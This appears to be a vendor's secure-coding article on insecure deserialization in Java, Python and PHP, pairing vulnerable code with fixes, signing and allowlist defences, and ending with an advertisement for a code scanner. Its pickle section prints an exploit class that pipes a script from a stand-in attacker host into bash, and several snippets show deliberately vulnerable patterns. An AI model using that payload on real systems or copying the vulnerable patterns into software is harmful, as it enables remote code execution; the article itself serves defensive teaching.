What Deserialization Is
Serialization is the process of converting an in-memory object into a byte stream or text format that can be stored or transmitted. Deserialization is the reverse: reconstructing an object from that byte stream. Languages and platforms such as Java, Python, PHP, Ruby, and .NET all have built-in serialization mechanisms.
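A minimal Python round trip makes the two directions concrete. This sketch uses the standard-library pickle and json modules; the Session class is a hypothetical example, not taken from any framework.

```python
import json
import pickle
from dataclasses import asdict, dataclass

@dataclass
class Session:
    """Hypothetical example object; not from any real framework."""
    user: str
    is_admin: bool

original = Session(user="alice", is_admin=False)

# Serialization: in-memory object -> bytes (pickle) or text (JSON)
blob = pickle.dumps(original)
text = json.dumps(asdict(original))

# Deserialization: bytes/text -> data again
restored = pickle.loads(blob)  # pickle rebuilds a real Session instance
data = json.loads(text)        # JSON only yields dict, list, str, int, float, bool, None

print(type(restored).__name__, restored == original)  # Session True
print(type(data).__name__, data)  # dict {'user': 'alice', 'is_admin': False}
```

The difference matters for everything that follows: the pickle bytes name the class to rebuild (by module and qualified name) and the loader imports and calls it, whereas the JSON text can only describe plain values.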
Applications use serialization for many legitimate purposes: storing session state in cookies, passing objects between microservices, caching complex objects in Redis, and carrying payloads over message queues and RPC calls. Once you start looking, it's everywhere.
OWASP A08:2021: Insecure Deserialization was A8 in the 2017 list and was folded into "Software and Data Integrity Failures" (A08) in 2021. It is high severity but has relatively lower incidence than injection; when it is exploitable, though, the result is typically full remote code execution (RCE).
Why Deserialization Is Dangerous
The core problem is that deserialization typically reconstructs a full object graph (including invoking constructors, setters, and magic methods) before your application code gets to validate the input. By the time you check whether the deserialized object looks legitimate, the damage may already be done.
If an attacker can control the serialized bytes fed into your deserializer, they can potentially craft a byte stream that, when deserialized, executes arbitrary code as a side effect of object reconstruction. This isn't a logic error in your code; it's the serialization mechanism itself being weaponised.
This is a real pattern in breaches: the 2015 Apache Commons Collections gadget chain (tracked per product, e.g. CVE-2015-4852 for Oracle WebLogic) affected virtually every Java application server of the era, including WebSphere, WebLogic, and JBoss, along with Jenkins. Thousands of organisations were running unauthenticated Java deserialization endpoints, and attackers hit them automatically.
Java Deserialization (the Classic)
Java's built-in serialization uses ObjectInputStream.readObject(). If an attacker can control the bytes being read, they can trigger a gadget chain: a sequence of classes already on the classpath whose methods, when chained together during deserialization, execute arbitrary OS commands.

```java
import java.io.*;

// Vulnerable: deserializes untrusted bytes directly
public Object deserialize(byte[] data) throws Exception {
    ByteArrayInputStream bis = new ByteArrayInputStream(data);
    ObjectInputStream ois = new ObjectInputStream(bis);
    return ois.readObject(); // Attacker controls data → RCE possible
}

// This pattern is also common in session handling:
// String cookieVal = request.getCookie("session");
// Object session = deserialize(Base64.decode(cookieVal)); // ← critical bug
```
Tools like ysoserial can generate exploit payloads for many common Java gadget chains (Commons Collections, Spring, Groovy, etc.). An attacker just needs to know which libraries are on your classpath.
Python Pickle β The Obvious Problem Nobody Fixes
Python's pickle module is explicit about the risk in its own documentation: "Never unpickle data received from an untrusted or unauthenticated source." And yet it shows up in codebases constantly β in ML model serving, in caching layers, in task queues.
```python
import os
import pickle

# What an attacker's crafted payload looks like
class Exploit(object):
    def __reduce__(self):
        return (os.system, ("curl http://attacker.com/shell.sh | bash",))

payload = pickle.dumps(Exploit())

# Vulnerable endpoint deserializes user-controlled data
def load_session(session_bytes: bytes):
    return pickle.loads(session_bytes)  # RCE if attacker controls input

# Fixed: use JSON for session data, not pickle
import json

def load_session_safe(session_str: str) -> dict:
    return json.loads(session_str)
```
ML model serving is a hotspot: Many ML pipelines pickle model objects, so if your model serving endpoint loads user-provided model files, those files can contain arbitrary code. Use ONNX, SafeTensors, or model registries with content validation instead of raw pickle for user-supplied inputs.
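One way to add content validation before a pickle is ever loaded is to inspect its opcodes statically. The sketch below uses the standard-library pickletools.genops, which walks the opcode stream without executing anything, and flags opcodes that import or call objects. The RISKY_OPCODES set and the helper names are our own heuristic, not an established tool: real model files often legitimately import classes, so in practice you would check which module.name pairs get imported against an allowlist, and a clean scan is a signal, not a proof of safety.

```python
import pickletools

# Heuristic: opcodes that import a global or call/instantiate something while
# unpickling. Plain data (dicts, lists, str, int, float, bool, None) needs none of them.
RISKY_OPCODES = {
    "GLOBAL", "STACK_GLOBAL",        # import module.attr
    "EXT1", "EXT2", "EXT4",          # import via the copyreg extension registry
    "REDUCE", "INST", "OBJ",         # call a callable / instantiate a class
    "NEWOBJ", "NEWOBJ_EX", "BUILD",  # construct objects / run __setstate__
}

def risky_opcodes(blob: bytes) -> set[str]:
    """Return the risky opcodes present in a pickle, without unpickling it."""
    found: set[str] = set()
    for opcode, _arg, _pos in pickletools.genops(blob):
        if opcode.name in RISKY_OPCODES:
            found.add(opcode.name)
    return found

def looks_like_plain_data(blob: bytes) -> bool:
    """True only if the pickle contains no import/call opcodes at all."""
    return not risky_opcodes(blob)
```

Run against the Exploit payload from the example above, risky_opcodes reports the import of os.system and the REDUCE that calls it, while a pickled dict of numbers comes back clean.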
PHP Object Injection
PHP's unserialize() reconstructs PHP objects from a string representation. If a class has magic methods like __wakeup(), __destruct(), or __toString() that perform dangerous operations, and an attacker can craft the serialized string to instantiate that class, those methods run automatically: __wakeup() during unserialize() itself, __destruct() when the object is destroyed (at the latest, when the script ends), and __toString() whenever the object is used as a string.

```php
// Vulnerable: user-controlled cookie deserialized
$data = unserialize(base64_decode($_COOKIE['user_prefs']));

// A class elsewhere in the codebase with a dangerous __destruct:
class FileLogger {
    public $logFile;
    public $logData;

    public function __destruct() {
        file_put_contents($this->logFile, $this->logData); // write anything anywhere
    }
}

// Fixed: use json_decode for structured data from cookies
$data = json_decode(base64_decode($_COOKIE['user_prefs']), true);
```
How Gadget Chains Work
You don't need a deliberately malicious class to exploit deserialization. Attackers chain together methods from legitimate classes already in your dependency tree ("gadgets"), where the output of one feeds into the next, ultimately reaching a code execution sink.
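A deliberately tiny Python analogue shows the shape of a chain. Report and Formatter are hypothetical classes, and neither is malicious on its own: Report recomputes a field in __setstate__ (which pickle calls while loading), and Formatter passes rendered text to whatever callback it was configured with. An attacker who controls the pickled state wires one into the other so that loading reaches a sink; here the sink is a harmless audit function standing in for something like os.system.

```python
import pickle

LOG: list[str] = []

def audit(message: str) -> None:
    """Harmless stand-in for a dangerous sink such as os.system."""
    LOG.append(message)

class Formatter:
    """Hypothetical legitimate helper: renders a template, passes it to a callback."""
    def __init__(self, callback, template: str):
        self.callback = callback
        self.template = template

    def render(self, value):
        return self.callback(self.template.format(value))

class Report:
    """Hypothetical legitimate class that recomputes a field after unpickling."""
    def __setstate__(self, state):
        self.__dict__.update(state)
        self.title = self.formatter.render(self.name)  # gadget: runs inside loads()

# Attacker side: build an object graph that links the two gadgets to the sink
evil = Report.__new__(Report)
evil.__dict__.update(formatter=Formatter(audit, "chain reached sink for {}"), name="x")
payload = pickle.dumps(evil)

# Victim side: merely loading the bytes runs Report -> Formatter -> audit
pickle.loads(payload)
print(LOG)  # ['chain reached sink for x']
```

No Report method is ever called by the victim's own code, and no validation step gets a chance to run: the chain completes inside pickle.loads(). Real chains work the same way, just across library classes the attacker did not write.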
For Java, the gadgets come from widely-used libraries: Apache Commons Collections, Spring Framework, Groovy. Tools like ysoserial automate generating payloads for dozens of known chains. For PHP, POP (Property-Oriented Programming) chains work similarly.
The implication: you can't fix this by "not using dangerous classes." The libraries you use for completely unrelated purposes contain the gadgets. The only real fix is to not deserialize untrusted data at all.
Safe Deserialization Patterns
The primary fix is architectural: don't pass attacker-controlled data to native deserializers.
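- Use JSON or MessagePack for structured data passing. Their parsers reconstruct plain data structures (maps, arrays, strings, numbers), not arbitrary objects, so parsing alone carries no code execution risk, as long as you don't enable polymorphic type handling such as Jackson's default typing or Json.NET's TypeNameHandling.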
- Sign serialized data with HMAC before storing/transmitting. Verify the signature before deserializing. An attacker can't forge a valid signature without your key.
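- For Java, use serialization filters (JEP 290, added in Java 9 and backported to Java 8u121). Configure an allowlist of the classes permitted to deserialize, either globally through the jdk.serialFilter property or per stream with ObjectInputFilter.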
- For Python, use safer alternatives to pickle: JSON, msgpack, or for complex objects, dataclasses + JSON.
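```python
import hashlib
import hmac
import json
import os

SECRET = os.environ["SESSION_SECRET"]

def serialize_session(data: dict) -> str:
    payload = json.dumps(data)
    sig = hmac.new(SECRET.encode(), payload.encode(), hashlib.sha256).hexdigest()
    return f"{payload}.{sig}"

def deserialize_session(token: str) -> dict:
    try:
        # A hex digest never contains ".", so the last "." separates payload and signature
        payload, sig = token.rsplit(".", 1)
        expected = hmac.new(SECRET.encode(), payload.encode(), hashlib.sha256).hexdigest()
        # Constant-time comparison; compare bytes, since non-ASCII str arguments raise TypeError
        if not hmac.compare_digest(sig.encode(), expected.encode()):
            raise ValueError("Invalid signature")
        # Parse only after the signature checks out
        return json.loads(payload)
    except ValueError as exc:
        # Catch parse/verification failures only; a bare except would also swallow
        # KeyboardInterrupt, SystemExit, and genuine bugs
        raise ValueError("Invalid session") from exc
```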
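Where pickle genuinely can't be removed yet, Python offers something close in spirit to a JEP 290 allowlist: subclass pickle.Unpickler and override find_class, which the unpickler calls for every global the stream asks to import. This sketch follows the "Restricting Globals" pattern from the Python pickle documentation; the ALLOWED set and the names AllowlistUnpickler and restricted_loads are assumptions you would tailor to your own types. It narrows what a payload can reach, but it is defense in depth, not a substitute for not unpickling untrusted data: anything on the allowlist becomes a potential gadget.

```python
import io
import pickle
from datetime import date

# Hypothetical allowlist: the (module, name) pairs this service really needs
ALLOWED = {
    ("datetime", "date"),
    ("builtins", "set"),
    ("builtins", "frozenset"),
}

class AllowlistUnpickler(pickle.Unpickler):
    def find_class(self, module: str, name: str):
        # Called for every global the pickle references, before anything is imported
        if (module, name) in ALLOWED:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"global '{module}.{name}' is forbidden")

def restricted_loads(data: bytes):
    return AllowlistUnpickler(io.BytesIO(data)).load()
```

For example, restricted_loads(pickle.dumps(date(2024, 1, 1))) succeeds, while the Exploit payload from the pickle section fails with UnpicklingError before os.system is ever looked up.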
Detection Checklist
- Audit all deserialization points: grep for pickle.load (which also matches pickle.loads), ObjectInputStream, unserialize(, Marshal.load, YAML.load
- Check where deserialized data originates: anything from HTTP requests, cookies, file uploads, or external queues is attacker-controlled
- Replace pickle with JSON for any data that doesn't genuinely need object serialization
- Sign after serializing, verify before deserializing: HMAC provides integrity
- Implement Java serialization filters: allowlist only the classes you need
- Run SAST in CI to catch dangerous deserialization patterns automatically
- Monitor for serialization-related exceptions: malformed payloads sent while probing often generate distinctive errors
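The grep step can be scripted. A minimal sketch, assuming your code lives in a local directory: it walks the tree, reads files whose suffix is in SOURCE_SUFFIXES (an assumption to adjust for your repo), and reports every line containing one of the checklist patterns, matched case-insensitively so Python's yaml.load is caught as well as Ruby's YAML.load. It searches for pickle.load, which also matches pickle.loads. Plain substring matching flags comments and imports and misses aliased calls such as from pickle import loads, so treat the output as a list for manual review, not a verdict.

```python
from pathlib import Path

# Checklist patterns, matched case-insensitively as plain substrings
PATTERNS = ("pickle.load", "ObjectInputStream", "unserialize(", "Marshal.load", "YAML.load")
# Assumption: which file types to scan; adjust for your codebase
SOURCE_SUFFIXES = {".py", ".java", ".php", ".rb", ".kt", ".scala"}

def find_deserialization_sites(root: str) -> list[tuple[str, int, str]]:
    """Return (path, line number, stripped line) for every pattern match under root."""
    lowered = [p.lower() for p in PATTERNS]
    hits: list[tuple[str, int, str]] = []
    for path in Path(root).rglob("*"):
        if not path.is_file() or path.suffix not in SOURCE_SUFFIXES:
            continue
        try:
            lines = path.read_text(encoding="utf-8", errors="replace").splitlines()
        except OSError:
            continue  # unreadable file: skip rather than abort the whole audit
        for lineno, line in enumerate(lines, start=1):
            if any(p in line.lower() for p in lowered):
                hits.append((str(path), lineno, line.strip()))
    return hits
```

Calling find_deserialization_sites("src") returns tuples you can print as path:line: text or attach to a review ticket; a SAST tool does the same job with real parsing and data-flow tracking.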
Find Dangerous Deserialization in Your Codebase
AquilaX SAST detects unsafe deserialization patterns in Java, Python, PHP, and Ruby β flagging every dangerous pattern before it reaches production.